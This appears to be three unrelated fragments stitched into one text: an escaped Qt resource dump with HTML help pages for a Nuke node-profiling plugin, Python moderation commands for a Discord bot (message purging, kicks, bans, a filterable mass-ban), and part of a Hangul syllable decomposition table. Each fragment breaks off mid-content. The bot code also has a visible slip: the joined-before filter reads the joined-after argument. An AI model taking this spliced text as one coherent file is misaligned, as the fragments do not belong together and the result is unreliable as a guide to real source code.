002C8.151 4.0443\
1 7.84117 3.9897\
9 7.53003 3.9999\
9C7.22804 3.9945\
6.92825 4.05246\
6.65002 4.17003\
C6.41146 4.27028\
6.19928 4.42423\
6.03003 4.61998\
C5.86442 4.8001 \
5.73536 5.01066 \
5.65002 5.23998C\
5.57068 5.47292 \
5.52028 5.7147 5\
.5 5.95995H6.729\
98C6.73725 5.744\
94 6.82673 5.540\
98 6.97998 5.39C\
7.05193 5.31511 \
7.13924 5.25671 \
7.2359 5.21874C7\
.33256 5.18076 7\
.43629 5.16414 7\
.53998 5.17003C7\
.62942 5.15581 7\
.72056 5.15581 7\
.81 5.17003C7.89\
216 5.2011 7.967\
08 5.24877 8.030\
03 5.31004C8.099\
5 5.37016 8.1542\
2 5.4454 8.19 5.\
53001C8.23097 5.\
62465 8.25141 5.\
72683 8.25 5.829\
94C8.25037 6.002\
65 8.21283 6.173\
33 8.14001 6.329\
94C8.06739 6.492\
83 7.97681 6.647\
2 7.87 6.79002L7\
.52002 7.20995C7\
.40002 7.33995 7\
.27998 7.47998 7\
.16998 7.61998C7\
.06332 7.75933 6\
.97279 7.91024 6\
.90002 8.06993C6\
.83065 8.22732 6\
.79648 8.39797 6\
.79999 8.56993V9\
.22997H8V8.73998\
C8.00339 8.59331\
8.04105 8.44943\
8.10999 8.31993\
C8.19183 8.17576\
8.28551 8.03871\
8.39001 7.91002\
L8.75 7.46996C8.\
88106 7.31855 9.\
00134 7.15818 9.\
10999 6.98998C9.\
22491 6.81846 9.\
31894 6.63376 9.\
39001 6.43993C9.\
46294 6.23444 9.\
50013 6.01808 9.\
5 5.80003C9.5017\
8 5.57285 9.4680\
7 5.34675 9.4000\
2 5.12999C9.3245\
1 4.9235 9.20506\
4.7358 9.04999 \
4.57994ZM6.8 9.8\
2996H7.97V11H6.8\
V9.82996Z\x22 fill=\
\x22#C5C5C5\x22/>\x0a</sv\
g>\x0a\
\x00\x00\x03\xba\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a <h1>\
Frames</h1>\x0a \
<p>Set the frame\
range for the t\
able view.</p>\x0a \
<p>When the t\
able is docked i\
nside Nuke main \
window, is likel\
y that there wil\
l not be\x0a \
much screen spa\
ce to display to\
ns of frames, so\
the default fra\
me range is set \
to 10. <br>\x0a \
But because \
the window can b\
e docked (and ma\
ximize on a diff\
erent monitor fo\
r example),\x0a \
you could en\
able the custom \
frame range and \
set your own.\x0a \
</p>\x0a <p>\x0a \
The secti\
on also shows wh\
ich node is the \
\x22heaviest\x22 (for \
each call type) \
for the given fr\
ame range.\x0a <\
/p>\x0a\x0a <dl>\x0a \
<dt><b>Max\
Call</b></dt>\x0a \
<dd>Node \
with the highest\
callCount from \
the given frame \
range</dd>\x0a\x0a \
<dt><b>Max C\
PU</b></dt>\x0a \
<dd>Node wit\
h the highest ti\
meTakenCPU from \
the given frame \
range</dd>\x0a\x0a \
<dt><b>Max W\
all</b></dt>\x0a \
<dd>Node wi\
th the highest t\
imeTakenWall fro\
m the given fram\
e range</dd>\x0a \
</dl>\x0a\x0a\x0a</body>\
\x0a\x0a</html>\
\x00\x00\x02o\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a\x0a <h1\
>Refresh Table</\
h1>\x0a <p>\x0a \
The main fun\
ctionality of th\
is button is to \
take a \x22snapshot\
\x22 of the current\
state and save \
it into the tabl\
e.\x0a (e.g \
when adding or d\
eleting nodes, t\
he table must be\
updated in orde\
r to reflect the\
changes).\x0a <\
/p>\x0a <p>\x0a \
When the pro\
filing listener \
is activated, by\
refreshing the \
table, you will \
also save the cu\
rrent timings st\
ate.\x0a <br\
>\x0a This m\
eans that you ca\
n stop the profi\
ling listener in\
Nuke (so to sav\
e some cpu resou\
rces) but still \
be able to\x0a \
inspect the l\
ast timings valu\
es.\x0a </p>\x0a\x0a</\
body>\x0a\x0a</html>\
\x00\x00\x03\x8b\
<\
!DOCTYPE html>\x0a<\
html>\x0a\x0a<body>\x0a \
<h1>Live Updat\
es</h1>\x0a\x0a <bl\
ockquote>\x0a \
The purpose of\
this section is\
explained in mo\
re details on th\
e readme.\x0a </\
blockquote>\x0a\x0a \
<p>Enable/Disab\
le live update.<\
/p>\x0a\x0a <dl>\x0a \
<dt><b>Ena\
ble:</b></dt>\x0a \
<dd>Enable\
/Disable live up\
date</dd>\x0a \
<dt><b>Update \
by:</b></dt>\x0a \
<dd>Chose b\
y which method t\
he updates will \
be made (<i>info\
on the official\
documentation</\
i>)\x0a \
<ul>\x0a \
<li>\x0a \
<b\
>updateUI</b>\x0a \
\
- These are ru\
n on every node \
after any change\
s to the script.\
\x0a \
</li>\x0a \
<li>\x0a \
\
<b>knobChanged</\
b>\x0a \
- These a\
re executed when\
the user change\
s the value of a\
ny knob when the\
\x0a \
control pan\
el is open.\x0a \
</li\
>\x0a </\
ul>\x0a </dd\
>\x0a </dt>\x0a\
</dl>\x0a</body\
>\x0a\x0a</html>\
\x00\x00\x07\x16\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a <h1>\
XML Report Table\
</h1>\x0a <p>Tab\
le that displays\
the xml report \
file that Nuke g\
enerates. To ope\
n a file, use th\
e <b>Open File</\
b> button on\x0a \
the toolbar\
.</p>\x0a <p>\x0a \
Each colum\
is a frame and \
on each row you \
will find the no\
de name.\x0a \
Because some no\
des could have l\
ong names, by ho\
vering over a ro\
w, a tooltip\x0a \
will appear\
displaying the \
entire name.\x0a \
</p>\x0a\x0a <p>\x0a \
The table\
offers a the sa\
me search bar th\
at is found on t\
he Dag page, so \
the same\x0a \
features are av\
ailable here; fi\
lter nodes using\
regex, filter b\
y name, class et\
c.\x0a </p>\x0a\x0a \
<h2>Need To Kno\
b</h2>\x0a <p>\x0a \
When load\
ing a xml file, \
the plugin will \
try to verify th\
at is a valid xm\
l file before lo\
ading;\x0a t\
hat is, will try\
to check for sy\
ntax errors, and\
if is a valid N\
uke profiling fi\
le. <br>\x0a \
When one or the\
other is not co\
rrect, the plugi\
n will give an a\
lert message wit\
h some indicatio\
n on how to fix\x0a\
it (e.g.\
missing closing\
tag).\x0a </p>\x0a\
<p>\x0a \
Also keep in min\
d that, if you a\
re trying to loa\
d an xml file th\
at just be gener\
ated form Nuke,\x0a\
remember\
that, You must \
close the Nuke a\
pp in order for \
the file to be c\
ompleted.\x0a </\
p>\x0a\x0a\x0a <h2>Un-\
dock Window</h2>\
\x0a\x0a <p>\x0a \
The entire tab\
le can be un-doc\
ked from the Nuk\
e main window.\x0a \
<br>\x0a \
This can be \
done in two ways\
;\x0a <ul>\x0a \
<li>By double\
clicking on the\
window title ba\
r</li>\x0a <\
li>By clicking o\
n the un-dock ic\
on.</li>\x0a </u\
l>\x0a\x0a You can \
dock back the wi\
ndow in the same\
way,\x0a double\
-clicking on the\
title bar or cl\
ick on the close\
icon.\x0a </p>\x0a\
\x0a <h2>Order/S\
ort</h2>\x0a <p>\
\x0a The tab\
le allows to sor\
t columns in asc\
ending or descen\
ding order by cl\
icking on a colu\
mn header.\x0a <\
/p>\x0a\x0a</body>\x0a\x0a</\
html>\
\x00\x00\x09\xb6\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a <h1>\
Timings</h1>\x0a \
<hr>\x0a <block\
quote>\x0a <\
b>NOTE:</b> The \
values will be c\
hanged only insi\
de the table.\x0a \
The DAG va\
lues will always\
be set to <b>En\
gine</b> and <b>\
ms</b>. <br>\x0a \
Also, most \
of the descripti\
ons are from the\
official docume\
ntation so\x0a \
please refer \
to it for a more\
in depth explan\
ation.\x0a </blo\
ckquote>\x0a <hr\
>\x0a\x0a <p>Change\
the timings for\
mat shown in the\
table.</p>\x0a\x0a \
<dl>\x0a <d\
t><b>Profiling t\
ype:</b></dt>\x0a \
<dd>\x0a \
Change th\
e profiling type\
.\x0a <u\
l>\x0a \
<li>\x0a \
<b>s\
tore</b> - store\
the values the \
user has selecte\
d on its knobs.\x0a\
\
</li>\x0a \
<li>\x0a \
<\
b>validate</b> -\
this is where t\
he node tells Nu\
ke about the out\
put it produces.\
\x0a \
</li>\x0a \
<li>\x0a \
\
<b>request</b> -\
his is where th\
e node works out\
what data it\x0a \
\
will need from\
its inputs in o\
rder to produce \
its output\x0a \
</li>\
\x0a \
<li>\x0a \
<b>eng\
ine</b> - this i\
s where the node\
does most of it\
s work, and actu\
ally generates i\
ts output.\x0a \
</li>\
\x0a </u\
l>\x0a\x0a </dd\
>\x0a <dt><b\
>Call type: <b>(\
Not present in D\
AG Inspector)</b\
></b></dt>\x0a \
<dd>Change th\
e call type insi\
de the table.\x0a \
<ul>\x0a \
<\
li>\x0a \
<b>callC\
ount</b> - tells\
you the number \
of times this pa\
rt of the proces\
sing has been ca\
lled.\x0a \
</li>\x0a \
<li>\
\x0a \
<b>timeTake\
nWall</b> - is t\
he time taken as\
it would be mea\
sured by a clock\
on the wall,\x0a \
\
i.e. the actua\
l time a user wo\
uld have to wait\
for the process\
ing to complete.\
\x0a \
</li>\x0a \
<li>\x0a \
\
<b>timeTakenCPU<\
/b> - On Linux, \
this is the time\
the CPU spent e\
xecuting the pro\
cessing code,\x0a \
\
On Mac and Win\
dows, the CPU ti\
me is not curren\
tly available.\x0a \
<\
/li>\x0a \
</ul>\x0a <\
/dd>\x0a <dt\
><b>Timings form\
at:</b></dt>\x0a \
<dd>Convert\
the current tim\
ings from millis\
econds to the ch\
osen value.\x0a \
<ul>\x0a \
<li\
> <b>ms</b> - mi\
lliseconds</li>\x0a\
\
<li> <b>s:ms</b>\
- seconds milli\
seconds</li>\x0a \
<li\
> <b>m:s</b> - m\
inutes seconds</\
li>\x0a \
<li> <b>m:s:\
ms</b> - minutes\
seconds millise\
conds</li>\x0a \
</ul>\x0a \
</dd>\x0a <\
/dl>\x0a</body>\x0a\x0a</\
html>\
\x00\x00\x03\xf7\
<\
!DOCTYPE html>\x0a<\
html>\x0a<style>\x0a</\
style>\x0a\x0a<body>\x0a\x0a\
<h1>DAG Tabl\
e</h1>\x0a <hr>\x0a\
<b>NOTE:</b>\
When opening a \
new Nuke session\
, the table will\
be empty.\x0a T\
o update its con\
tent you must cl\
ick on the <b>Re\
fresh Table</b> \
button. <br>\x0a \
<hr>\x0a\x0a <p>\x0a \
The table\
shows the curre\
nt nodes present\
in the DAG and\x0a\
their re\
spective profili\
ng stats if prof\
iling listener i\
s activated.\x0a \
</p>\x0a\x0a\x0a <h2>\
Order/Sort</h2>\x0a\
<p>\x0a \
The table allows\
to sort columns\
in ascending or\
descending orde\
r by clicking on\
a column header\
.\x0a </p>\x0a\x0a \
<h2>Navigation/I\
nteractions</h2>\
\x0a\x0a <p>\x0a \
The table can \
be navigated by \
mouse or arrow k\
eyboard when the\
table is in foc\
us.\x0a </p>\x0a \
<ul>\x0a <l\
i>Up/Down arrows\
will | |
await ctx.send(Translator.translate(ctx.guild, "mkick_success", _emote="YES", users=kicked, total=len(kicked)))
on_time = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")
await Logging.log_to_guild(ctx.guild.id, "memberLogChannel", Translator.translate(ctx.guild, "log_mass_kick", _emote="SHOE", on_time=on_time, users=kicked, moderator=ctx.author, moderator_id=ctx.author.id, reason=reason))
@commands.guild_only()
@commands.command()
@commands.has_permissions(manage_messages=True)
async def purge(self, ctx, amount: RangedInt(1, 200)):
"""purge_help"""
await ctx.invoke(self.clean_all, amount)
@commands.guild_only()
@commands.group(aliases=["clear"])
@commands.has_permissions(manage_messages=True)
async def clean(self, ctx):
"""clean_help"""
if ctx.invoked_subcommand == self.clean:
await ctx.invoke(self.bot.get_command("help"), qeury="clean")
@commands.guild_only()
@clean.command("user")
@commands.has_permissions(manage_messages=True)
async def clean_user(self, ctx, users: commands.Greedy[DiscordUser], amount: RangedInt(1, 500) = 50):
"""clean_user_help"""
if len(users) == 0:
return await ctx.send(Translator.translate(ctx.guild, "no_delete_then", _emote="THINK"))
await self.perform_cleaning(ctx, amount, lambda x: any(x.author.id == u.id for u in users))
@commands.guild_only()
@clean.command("bots")
@commands.has_permissions(manage_messages=True)
async def clean_bots(self, ctx, amount: RangedInt(1, 200) = 50):
"""clean_bots_help"""
await self.perform_cleaning(ctx, amount, lambda x: x.author.bot)
@commands.guild_only()
@clean.command("all")
@commands.has_permissions(manage_messages=True)
async def clean_all(self, ctx, amount: RangedInt(1, 200)):
"""clean_all_help"""
await self.perform_cleaning(ctx, amount, lambda x: True)
@commands.guild_only()
@clean.command(name="last", usage="<duration>")
@commands.has_permissions(manage_messages=True)
async def clean_last(self, ctx: commands.Command, duration: Duration, excess = ""):
"""clean_last_help"""
if duration.unit is None:
duration.unit = excess
until = datetime.datetime.utcfromtimestamp(time.time() - duration.to_seconds(ctx))
await self.perform_cleaning(ctx, 500, lambda x: True, time=until)
@commands.guild_only()
@clean.command("until")
@commands.has_permissions(manage_messages=True)
async def clean_until(self, ctx, message: discord.Message):
"""clean_until_help"""
try:
await self.perform_cleaning(ctx, 500, lambda x: True, after=message)
except Exception as ex:
print(ex)
@commands.guild_only()
@clean.command("between")
@commands.has_permissions(manage_messages=True)
async def clean_between(self, ctx, start: discord.Message, end: discord.Message):
"""clean_between_help"""
await self.perform_cleaning(ctx, 500, lambda x: True, before=end, after=start)
async def _ban(self, ctx, user, reason, days=0):
try:
await ctx.guild.ban(user=user, reason=reason, delete_message_days=days)
except Exception as e:
return await ctx.send(Translator.translate(ctx.guild, "ban_failed", _emote="NO", error=e))
async def _kick(self, ctx, user, reason):
try:
await ctx.guild.kick(user=user, reason=reason)
except Exception as e:
return await ctx.send(Translator.translate(ctx.guild, "kick_failed", _emote="NO", error=e))
async def _unban(self, ctx, user, reason):
try:
await ctx.guild.unban(user=user, reason=reason)
except Exception as e:
return await ctx.send(Translator.translate(ctx.guild, "unban_failed", _emote="NO", error=e))
async def _forceban(self, ctx, user, reason):
if user.discriminator == "0000":
return await ctx.send(Translator.translate(ctx.guild, "is_system_user", _emote="NO"))
try:
await ctx.guild.ban(user=user, reason=reason)
except Exception as e:
return await ctx.send(Translator.translate(ctx.guild, "ban_failed", _emote="NO", error=e))
async def is_banned(self, ctx, user):
try:
await ctx.guild.fetch_ban(user)
return True
except Exception:
return False
async def perform_cleaning(self, ctx, limit, check, *, before=None, after=None, time=None):
if ctx.channel.id in self.bot.cleans_running:
return await ctx.send(Translator.translate(ctx.guild, "already_cleaning", _emote="NO"))
if limit > 500:
return await ctx.send(Translator.translate(ctx.guild, "too_many_messages", _emote="NO", limit=limit))
if before is None:
before = ctx.message
else:
if isinstance(before, discord.Message):
before = before
else:
before = discord.Object(id=before)
if after is not None:
if isinstance(after, discord.Message):
after = after
else:
after = discord.Object(id=after)
# after is set to a discord Object (message), which won't work for the clean last command
# therefore we have to change its type if a time is given
if time is not None:
after = time
self.bot.cleans_running[ctx.channel.id] = set()
try:
deleted = await ctx.channel.purge(limit=limit, before=before, after=after, check=check)
await ctx.send(Translator.translate(ctx.guild, "clean_success", _emote="YES", deleted=len(deleted), plural="" if len(deleted) == 1 else "s"))
except Exception as ex:
await ctx.send(Translator.translate(ctx.guild, "cleaning_error", _emote="NO", error=ex))
self.bot.loop.create_task(self.finish_purgings(ctx.channel.id))
self.bot.loop.create_task(self.finish_purgings(ctx.channel.id))
async def finish_purgings(self, channel_id):
await asyncio.sleep(1) # we don't want to miss any delete events
del self.bot.cleans_running[channel_id]
async def can_act(self, ctx, target, moderator):
automod = ctx.guild.get_member(self.bot.user.id)
if target.top_role.position >= moderator.top_role.position or target.top_role.position >= automod.top_role.position or ctx.guild.owner.id == target.id or target.id == moderator.id or target.id == automod.id:
return False
try:
await ctx.guild.fetch_ban(target)
await ctx.send(Translator.translate(ctx.guild, "target_already_banned", _emote="NO_MOUTH"))
return False
except discord.NotFound:
return True
else:
return True
######## complex moderation commands
@commands.command()
@commands.guild_only()
@commands.has_permissions(ban_members=True)
async def massban(self, ctx, *, args):
"""massban_help"""
if not isinstance(ctx.author, discord.Member): # sometime discord just thinks the author isn't a guild member, wtf?
try:
author = await ctx.guild.fetch_member(ctx.author.id)
except discord.HTTPException:
return await ctx.send(Translator.translate(ctx.guild, "no_member_object"))
else:
author = ctx.author
"""Define arguments"""
p = Arguments(add_help=False, allow_abbrev=False)
p.add_argument("--channel", "-c")
p.add_argument("--reason", "-r")
p.add_argument("--search", type=int, default=100)
p.add_argument("--regex")
p.add_argument("--no-avatar", action="store_true")
p.add_argument("--no-roles", action="store_true")
p.add_argument("--created", type=int)
p.add_argument("--joined", type=int)
p.add_argument("--joined-before", type=str or int)
p.add_argument("--joined-after", type=str or int)
p.add_argument("--contains")
p.add_argument("--starts")
p.add_argument("--ends")
p.add_argument("--match")
p.add_argument("--show", action="store_true")
p.add_argument("--embeds", action="store_const", const=lambda m: len(m.embeds))
p.add_argument("--files", action="store_const", const=lambda m: len(m.attachments))
p.add_argument("--after", type=int)
p.add_argument("--before", type=int)
try:
args = p.parse_args(shlex.split(args))
except Exception as ex:
return await ctx.send(str(ex))
targets = []
if args.channel:
channel = await commands.TextChannelConverter().convert(ctx, args.channel)
before = args.before and discord.Object(id=args.before)
after = args.after and discord.Object(id=args.after)
pr = []
if args.contains:
pr.append(lambda m: args.contains.lower() in m.content.lower())
if args.starts:
pr.append(lambda m: m.content.startswith(args.starts))
if args.ends:
pr.append(lambda m: m.content.endswith(args.ends))
if args.match:
try:
_match = re.compile(args.match)
except re.error as ex:
return await ctx.send(Translator.translate(ctx.guild, "invalid_regex", ex=ex))
else:
pr.append(lambda m, x = _match: x.match(m.content))
if args.embeds:
pr.append(args.embeds)
if args.files:
pr.append(args.files)
async for message in channel.history(limit=min(max(1, args.search), 2000), before=before, after=after):
if all(_p(message) for _p in pr):
targets.append(message.author)
else:
if ctx.guild.chunked:
targets = ctx.guild.members
else:
async with ctx.typing():
await ctx.guild.chunk(cache=True)
targets = ctx.guild.members
pr = [
lambda m: isinstance(m, discord.Member) and can_execute(ctx, author, m),
lambda m: not m.bot,
lambda m: m.discriminator != "0000"
]
converter = commands.MemberConverter()
if args.regex:
try:
_regex = re.compile(args.regex)
except re.error as ex:
return await ctx.send(Translator.translate(ctx.guild, "invalid_regex", ex=ex))
else:
pr.append(lambda m, x = _regex: x.match(m.name))
if args.no_avatar:
pr.append(lambda m: m.avatar is None)
if args.no_roles:
pr.append(lambda m: len(getattr(m, "roles", [])) <= 1)
now = datetime.datetime.utcnow()
if args.created:
def created(member, *, offset=now - datetime.timedelta(minutes=args.created)):
return member.created_at > offset
pr.append(created)
if args.joined:
def joined(member, *, offset=now - datetime.timedelta(minutes=args.joined)):
if isinstance(member, discord.User):
return True # in this case they already left the server
return member.joined_at > offset
pr.append(joined)
if args.joined_after:
_joined_after_member = await converter.convert(ctx, args.joined_after)
def joined_after(member, *, _other=_joined_after_member):
return member.joined_at and _other.joined_at and member.joined_at > _other.joined_at
pr.append(joined_after)
if args.joined_before:
_joined_before_member = await converter.convert(ctx, args.joined_after)
def joined_before(member, *, _other=_joined_before_member):
return member.joined_at and _other.joined_at and member.joined_at < _other.joined_at
pr.append(joined_before)
targets = {m for m in targets if all(_p(m) for _p in pr)}
if len(targets) == 0:
return await ctx.send(Translator.translate(ctx.guild, "no_targets_found", _emote="NO"))
if args.show:
targets = sorted(targets, key=lambda m: m.joined_at or now)
fmt = "\n".join(f"{m.id}\tJoined: {m.joined_at}\tCreated: {m.created_at}\n{m}" for m in targets)
content = f"Time right now: {datetime.datetime.utcnow()}\nTotal targets: {len(targets)}\n{fmt}"
f = discord.File(io.BytesIO(content.encode("utf-8")), filename="members.txt")
return await ctx.send(file=f)
if args.reason is None:
return await ctx.send(Translator.translate(ctx.guild, "missing_reason_flag"))
else:
reason = await Reason().convert(ctx, args.reason)
confirm = await ctx.prompt(f'This action will ban {len(targets)} member{"" if len(targets) == 1 else "s"}. Are you sure?')
if not confirm:
return await ctx.send(Translator.translate(ctx.guild, "aborting"))
banned = 0
for target in targets:
try:
await self._forceban(ctx, target, reason)
self.bot.running_removals.add(target.id)
case = DBUtils.new_case()
timestamp = datetime.datetime.utcnow().strftime("%d/%m/%Y %H:%M")
DBUtils.insert(db.inf, new_infraction(case, ctx.guild.id, target, ctx.author, timestamp, "Ban", f"[Custom Ban] {reason}"))
except discord.HTTPException:
pass
else:
banned += 1
await ctx.send(Translator.translate(ctx.guild, "mban_success", _emote="YES", users=banned, total=len(targets)))
on_time = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")
await Logging.log_to_guild(ctx.guild.id, "memberLogChannel", Translator.translate(ctx.guild, "log_mass_ban", _emote="ALERT", on_time=on_time, users=banned, moderator=ctx.author, moderator_id=ctx.author.id, reason=reason))
@clean.command()
@commands.guild_only()
@commands.has_permissions(manage_messages=True)
async def custom(self, ctx, *, args: str):
"""clean_custom_help"""
try:
p = Arguments(add_help=False, allow_abbrev=False)
p.add_argument("--user", nargs="+")
p.add_argument("--contains", nargs="+")
p.add_argument("--starts", nargs="+")
p.add_argument("--ends", nargs="+")
p.add_argument("--or", action="store_true", dest="_or")
p.add_argument("--not", action="store_true", dest="_not")
p.add_argument("--emoji", action="store_true")
p.add_argument("--bot", action="store_const", const=lambda m: m.author.bot)
p.add_argument("--embeds", action="store_const", const=lambda m: len(m.embeds))
p.add_argument("--files", action="store_const", const=lambda m: len(m.attachments))
p.add_argument("--reactions", action="store_const", const=lambda m: len(m.reactions))
p.add_argument("--search", type=int)
p.add_argument("--after", type=int)
p.add_argument("--before", type=int)
try:
args = p.parse_args(shlex.split(args))
except Exception as ex:
return await ctx.send(str(ex))
pr = []
if args.bot:
pr.append(args.bot)
if args.embeds:
pr.append(args.embeds)
if args.files:
pr.append(args.files)
if args.reactions:
pr.append(args.reactions)
if args.emoji:
custom_emote = re.compile(r"<:(\w+):(\d+)>")
pr.append(lambda m: custom_emote.search(m.content))
if args.user:
targets = []
converter = commands.MemberConverter()
for t in args.user:
try:
target = await converter.convert(ctx, t)
targets.append(target)
except Exception as ex:
return await ctx.send(str(ex))
pr.append(lambda m: m.author in targets)
if args.contains:
pr.append(lambda m: any(s in m.content for s in args.contains))
if args.starts:
pr.append(lambda m: any(m.content.startswith(s) for s in args.starts))
if args.ends:
pr.append(lambda m: any(m.content.endswith(s) for s in args.ends))
o = all if not args._or else any
def check(m):
r = o(p(m) for p in pr)
if args._not:
return not r
return r
if args.after:
if args.search is None:
args.search = 2000
if args.search is None:
args.search = 100
args.search = max(0, min(2000, args.search))
def point(ctx, before=None, after=None):
if before is None:
before = ctx.message
else:
before = discord.Object(id=before)
if after is not None:
after = discord.Object(id=after)
return before, after
before, after = point(ctx, args.before, args.after)
if ctx.channel.id in self.bot.cleans_running:
return await ctx.send(Translator.translate(ctx.guild, "already_cleaning", _emote="NO"))
self.bot.cleans_running[ctx.channel.id] = set()
_msg = | |
49113: "4360 4462 4532",
49114: "4360 4462 4533",
49115: "4360 4462 4534",
49116: "4360 4462 4535",
49117: "4360 4462 4536",
49118: "4360 4462 4537",
49119: "4360 4462 4538",
49120: "4360 4462 4539",
49121: "4360 4462 4540",
49122: "4360 4462 4541",
49123: "4360 4462 4542",
49124: "4360 4462 4543",
49125: "4360 4462 4544",
49126: "4360 4462 4545",
49127: "4360 4462 4546",
49128: "4360 4463",
49129: "4360 4463 4520",
49130: "4360 4463 4521",
49131: "4360 4463 4522",
49132: "4360 4463 4523",
49133: "4360 4463 4524",
49134: "4360 4463 4525",
49135: "4360 4463 4526",
49136: "4360 4463 4527",
49137: "4360 4463 4528",
49138: "4360 4463 4529",
49139: "4360 4463 4530",
49140: "4360 4463 4531",
49141: "4360 4463 4532",
49142: "4360 4463 4533",
49143: "4360 4463 4534",
49144: "4360 4463 4535",
49145: "4360 4463 4536",
49146: "4360 4463 4537",
49147: "4360 4463 4538",
49148: "4360 4463 4539",
49149: "4360 4463 4540",
49150: "4360 4463 4541",
49151: "4360 4463 4542",
49152: "4360 4463 4543",
49153: "4360 4463 4544",
49154: "4360 4463 4545",
49155: "4360 4463 4546",
49156: "4360 4464",
49157: "4360 4464 4520",
49158: "4360 4464 4521",
49159: "4360 4464 4522",
49160: "4360 4464 4523",
49161: "4360 4464 4524",
49162: "4360 4464 4525",
49163: "4360 4464 4526",
49164: "4360 4464 4527",
49165: "4360 4464 4528",
49166: "4360 4464 4529",
49167: "4360 4464 4530",
49168: "4360 4464 4531",
49169: "4360 4464 4532",
49170: "4360 4464 4533",
49171: "4360 4464 4534",
49172: "4360 4464 4535",
49173: "4360 4464 4536",
49174: "4360 4464 4537",
49175: "4360 4464 4538",
49176: "4360 4464 4539",
49177: "4360 4464 4540",
49178: "4360 4464 4541",
49179: "4360 4464 4542",
49180: "4360 4464 4543",
49181: "4360 4464 4544",
49182: "4360 4464 4545",
49183: "4360 4464 4546",
49184: "4360 4465",
49185: "4360 4465 4520",
49186: "4360 4465 4521",
49187: "4360 4465 4522",
49188: "4360 4465 4523",
49189: "4360 4465 4524",
49190: "4360 4465 4525",
49191: "4360 4465 4526",
49192: "4360 4465 4527",
49193: "4360 4465 4528",
49194: "4360 4465 4529",
49195: "4360 4465 4530",
49196: "4360 4465 4531",
49197: "4360 4465 4532",
49198: "4360 4465 4533",
49199: "4360 4465 4534",
49200: "4360 4465 4535",
49201: "4360 4465 4536",
49202: "4360 4465 4537",
49203: "4360 4465 4538",
49204: "4360 4465 4539",
49205: "4360 4465 4540",
49206: "4360 4465 4541",
49207: "4360 4465 4542",
49208: "4360 4465 4543",
49209: "4360 4465 4544",
49210: "4360 4465 4545",
49211: "4360 4465 4546",
49212: "4360 4466",
49213: "4360 4466 4520",
49214: "4360 4466 4521",
49215: "4360 4466 4522",
49216: "4360 4466 4523",
49217: "4360 4466 4524",
49218: "4360 4466 4525",
49219: "4360 4466 4526",
49220: "4360 4466 4527",
49221: "4360 4466 4528",
49222: "4360 4466 4529",
49223: "4360 4466 4530",
49224: "4360 4466 4531",
49225: "4360 4466 4532",
49226: "4360 4466 4533",
49227: "4360 4466 4534",
49228: "4360 4466 4535",
49229: "4360 4466 4536",
49230: "4360 4466 4537",
49231: "4360 4466 4538",
49232: "4360 4466 4539",
49233: "4360 4466 4540",
49234: "4360 4466 4541",
49235: "4360 4466 4542",
49236: "4360 4466 4543",
49237: "4360 4466 4544",
49238: "4360 4466 4545",
49239: "4360 4466 4546",
49240: "4360 4467",
49241: "4360 4467 4520",
49242: "4360 4467 4521",
49243: "4360 4467 4522",
49244: "4360 4467 4523",
49245: "4360 4467 4524",
49246: "4360 4467 4525",
49247: "4360 4467 4526",
49248: "4360 4467 4527",
49249: "4360 4467 4528",
49250: "4360 4467 4529",
49251: "4360 4467 4530",
49252: "4360 4467 4531",
49253: "4360 4467 4532",
49254: "4360 4467 4533",
49255: "4360 4467 4534",
49256: "4360 4467 4535",
49257: "4360 4467 4536",
49258: "4360 4467 4537",
49259: "4360 4467 4538",
49260: "4360 4467 4539",
49261: "4360 4467 4540",
49262: "4360 4467 4541",
49263: "4360 4467 4542",
49264: "4360 4467 4543",
49265: "4360 4467 4544",
49266: "4360 4467 4545",
49267: "4360 4467 4546",
49268: "4360 4468",
49269: "4360 4468 4520",
49270: "4360 4468 4521",
49271: "4360 4468 4522",
49272: "4360 4468 4523",
49273: "4360 4468 4524",
49274: "4360 4468 4525",
49275: "4360 4468 4526",
49276: "4360 4468 4527",
49277: "4360 4468 4528",
49278: "4360 4468 4529",
49279: "4360 4468 4530",
49280: "4360 4468 4531",
49281: "4360 4468 4532",
49282: "4360 4468 4533",
49283: "4360 4468 4534",
49284: "4360 4468 4535",
49285: "4360 4468 4536",
49286: "4360 4468 4537",
49287: "4360 4468 4538",
49288: "4360 4468 4539",
49289: "4360 4468 4540",
49290: "4360 4468 4541",
49291: "4360 4468 4542",
49292: "4360 4468 4543",
49293: "4360 4468 4544",
49294: "4360 4468 4545",
49295: "4360 4468 4546",
49296: "4360 4469",
49297: "4360 4469 4520",
49298: "4360 4469 4521",
49299: "4360 4469 4522",
49300: "4360 4469 4523",
49301: "4360 4469 4524",
49302: "4360 4469 4525",
49303: "4360 4469 4526",
49304: "4360 4469 4527",
49305: "4360 4469 4528",
49306: "4360 4469 4529",
49307: "4360 4469 4530",
49308: "4360 4469 4531",
49309: "4360 4469 4532",
49310: "4360 4469 4533",
49311: "4360 4469 4534",
49312: "4360 4469 4535",
49313: "4360 4469 4536",
49314: "4360 4469 4537",
49315: "4360 4469 4538",
49316: "4360 4469 4539",
49317: "4360 4469 4540",
49318: "4360 4469 4541",
49319: "4360 4469 4542",
49320: "4360 4469 4543",
49321: "4360 4469 4544",
49322: "4360 4469 4545",
49323: "4360 4469 4546",
49324: "4361 4449",
49325: "4361 4449 4520",
49326: "4361 4449 4521",
49327: "4361 4449 4522",
49328: "4361 4449 4523",
49329: "4361 4449 4524",
49330: "4361 4449 4525",
49331: "4361 4449 4526",
49332: "4361 4449 4527",
49333: "4361 4449 4528",
49334: "4361 4449 4529",
49335: "4361 4449 4530",
49336: "4361 4449 4531",
49337: "4361 4449 4532",
49338: "4361 4449 4533",
49339: "4361 4449 4534",
49340: "4361 4449 4535",
49341: "4361 4449 4536",
49342: "4361 4449 4537",
49343: "4361 4449 4538",
49344: "4361 4449 4539",
49345: "4361 4449 4540",
49346: "4361 4449 4541",
49347: "4361 4449 4542",
49348: "4361 4449 4543",
49349: "4361 4449 4544",
49350: "4361 4449 4545",
49351: "4361 4449 4546",
49352: "4361 4450",
49353: "4361 4450 4520",
49354: "4361 4450 4521",
49355: "4361 4450 4522",
49356: "4361 4450 4523",
49357: "4361 4450 4524",
49358: "4361 4450 4525",
49359: "4361 4450 4526",
49360: "4361 4450 4527",
49361: "4361 4450 4528",
49362: "4361 4450 4529",
49363: "4361 4450 4530",
49364: "4361 4450 4531",
